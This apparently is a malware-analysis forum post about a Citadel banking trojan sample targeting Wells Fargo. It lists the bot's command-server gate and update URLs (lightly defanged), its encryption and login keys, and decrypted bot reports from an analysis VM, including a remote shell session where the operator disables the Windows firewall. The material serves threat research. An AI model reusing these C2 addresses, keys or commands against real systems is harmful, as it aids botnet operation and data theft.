Citadel targeting wellsfargo
Code: Select all
haha:
Drop: hxtp://fragmentationclicked.net/ma/so/gate.php
Update: hxtp://fragmentationclicked.net/ma/so/file.php|file=soft.exe
Key: BC 9D 3E 27 85 9B 87 13 3A 5C E9 4C 73 2D 79 54
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Code: Select all
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=1
rtime=06:03:54 05.11.2013
time_system=06:03:26 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Wininet(Internet Explorer) cookies:
Path: wiki.wireshark.org/
__utma=44101410.1372036583.1345021049.1345021049.1345021049.1
__utmb=44101410.1.10.1345021049
__utmz=44101410.1345021049.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=400
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
1: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
2: Microsoft Corporation | Update for Windows XP (KB898461) | 1
3: Microsoft Corporation | Hotfix for Windows XP (KB942288-v3) | 3
4: Microsoft Corporation | Hotfix for Windows XP (KB954550-v5) | 5
5: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | Unknown
6: David Zimmer | SysAnalyzer 1.0 | Unknown
7: CACE Technologies | WinPcap 4.1.1 | 4.1.0.1753
8: Unknown | WinRAR archiver | Unknown
9: The Wireshark developer community, http://www.wireshark.org | Wireshark 1.2.9 | 1.2.9
10: Safer Networking Limited | FileAlyzer | 1.6.0.4
11: Microsoft Corporation | WebFldrs XP | 9.50.7523
12: Microsoft Corporation | Microsoft Software Update for Web Folders (English) 12 | 12.0.4518.1014
13: Microsoft Corporation | Microsoft Office Access MUI (English) 2007 | 12.0.4518.1014
14: Microsoft Corporation | Microsoft Office Excel MUI (English) 2007 | 12.0.4518.1014
15: Microsoft Corporation | Microsoft Office PowerPoint MUI (English) 2007 | 12.0.4518.1014
16: Microsoft Corporation | Microsoft Office Publisher MUI (English) 2007 | 12.0.4518.1014
17: Microsoft Corporation | Microsoft Office Outlook MUI (English) 2007 | 12.0.4518.1014
18: Microsoft Corporation | Microsoft Office Word MUI (English) 2007 | 12.0.4518.1014
19: Microsoft Corporation | Microsoft Office Proof (English) 2007 | 12.0.4518.1014
20: Microsoft Corporation | Microsoft Office Proof (French) 2007 | 12.0.4518.1014
21: Microsoft Corporation | Microsoft Office Proof (Spanish) 2007 | 12.0.4518.1014
22: Microsoft Corporation | Microsoft Office Proofing (English) 2007 | 12.0.4518.1014
23: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
24: Microsoft Corporation | Microsoft Office InfoPath MUI (English) 2007 | 12.0.4518.1014
25: Microsoft Corporation | Microsoft Office Shared MUI (English) 2007 | 12.0.4518.1014
26: Microsoft Corporation | Microsoft Office OneNote MUI (English) 2007 | 12.0.4518.1014
27: Microsoft Corporation | Microsoft Office Groove MUI (English) 2007 | 12.0.4518.1014
28: Microsoft Corporation | Microsoft Office Groove Setup Metadata MUI (English) 2007 | 12.0.4518.1014
29: Microsoft Corporation | Microsoft Office Shared Setup Metadata MUI (English) 2007 | 12.0.4518.1014
30: Microsoft Corporation | Microsoft Office Access Setup Metadata MUI (English) 2007 | 12.0.4518.1014
31: Microsoft Corporation | Microsoft .NET Framework 3.0 Service Pack 2 | 3.2.30729
32: Microsoft Corporation | Microsoft .NET Framework 2.0 Service Pack 2 | 2.2.30729
33: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | 3.5.30729
34: Microsoft Corporation | Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) | 1
35: VMware, Inc. | VMware Tools | 8.4.5.14951
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=402
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=401
rtime=06:06:56 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=300
rtime=06:06:56 05.11.2013
time_system=06:03:42 05.11.2013
time_tick=00:48:22
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
C:\Documents and Settings\Administrator>prompt $Q$Q$Q$Q$Q$Q$Q$Q$Q$Q[ $P ]$G
==========[ C:\Documents and Settings\Administrator ]>hostname
mcafee-7bee0e38
==========[ C:\Documents and Settings\Administrator ]>tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
System 4 Console 0 212 K
smss.exe 556 Console 0 372 K
csrss.exe 616 Console 0 4,568 K
winlogon.exe 640 Console 0 11,140 K
services.exe 684 Console 0 8,016 K
lsass.exe 696 Console 0 1,780 K
vmacthlp.exe 852 Console 0 2,368 K
svchost.exe 896 Console 0 4,856 K
svchost.exe 976 Console 0 4,364 K
svchost.exe 1076 Console 0 23,952 K
svchost.exe 1132 Console 0 3,388 K
svchost.exe 1228 Console 0 4,304 K
explorer.exe 1508 Console 0 15,812 K
spoolsv.exe 1564 Console 0 7,492 K
VMwareTray.exe 1972 Console 0 5,848 K
VMwareUser.exe 1984 Console 0 13,732 K
vmtoolsd.exe 1776 Console 0 9,028 K
VMUpgradeHelper.exe 2028 Console 0 3,884 K
TPAutoConnSvc.exe 480 Console 0 3,976 K
alg.exe 1412 Console 0 3,420 K
wscntfy.exe 1700 Console 0 6,340 K
TPAutoConnect.exe 1740 Console 0 8,260 K
wuauclt.exe 864 Console 0 8,540 K
ctfmon.exe 1152 Console 0 7,144 K
mscorsvw.exe 2476 Console 0 3,868 K
wireshark.exe 3468 Console 0 11,696 K
procexp.exe 3440 Console 0 11,796 K
dumpcap.exe 1600 Console 0 8,748 K
sysAnalyzer.exe 3876 Console 0 11,136 K
regshot.exe 3944 Console 0 34,092 K
msiexec.exe 3624 Console 0 16,632 K
wuauclt.exe 816 Console 0 6,548 K
EXCEL.EXE 848 Console 0 27,040 K
rundll32.exe 2884 Console 0 7,672 K
cmd.exe 336 Console 0 3,800 K
tasklist.exe 3548 Console 0 7,796 K
wmiprvse.exe 2148 Console 0 5,540 K
==========[ C:\Documents and Settings\Administrator ]>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : mcafee-7bee0e38
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-0C-29-78-26-70
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.182.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.182.2
DHCP Server . . . . . . . . . . . : 192.168.182.254
DNS Servers . . . . . . . . . . . : 192.168.182.2
Primary WINS Server . . . . . . . : 192.168.182.2
Lease Obtained. . . . . . . . . . : Tuesday, November 05, 2013 11:30:49 AM
Lease Expires . . . . . . . . . . : Tuesday, November 05, 2013 12:00:49 PM
==========[ C:\Documents and Settings\Administrator ]>netsh firewall set opmode disable
Ok.
==========[ C:\Documents and Settings\Administrator ]>
==========[ C:\Documents and Settings\Administrator ]>exit
Code: Select all
https://zeustracker.abuse.ch/monitor.ph ... licked.nethtxp://46.183.220.124/demi/web.exe
https://www.virustotal.com/en/file/ec4fa711aa76c8ae7a218481c39f425a4aac86fe34c4fdceabc86596e1c6d592/analysis/1383824478/
Attachments
infected
(5.8 KiB) Downloaded 52 times
(5.8 KiB) Downloaded 52 times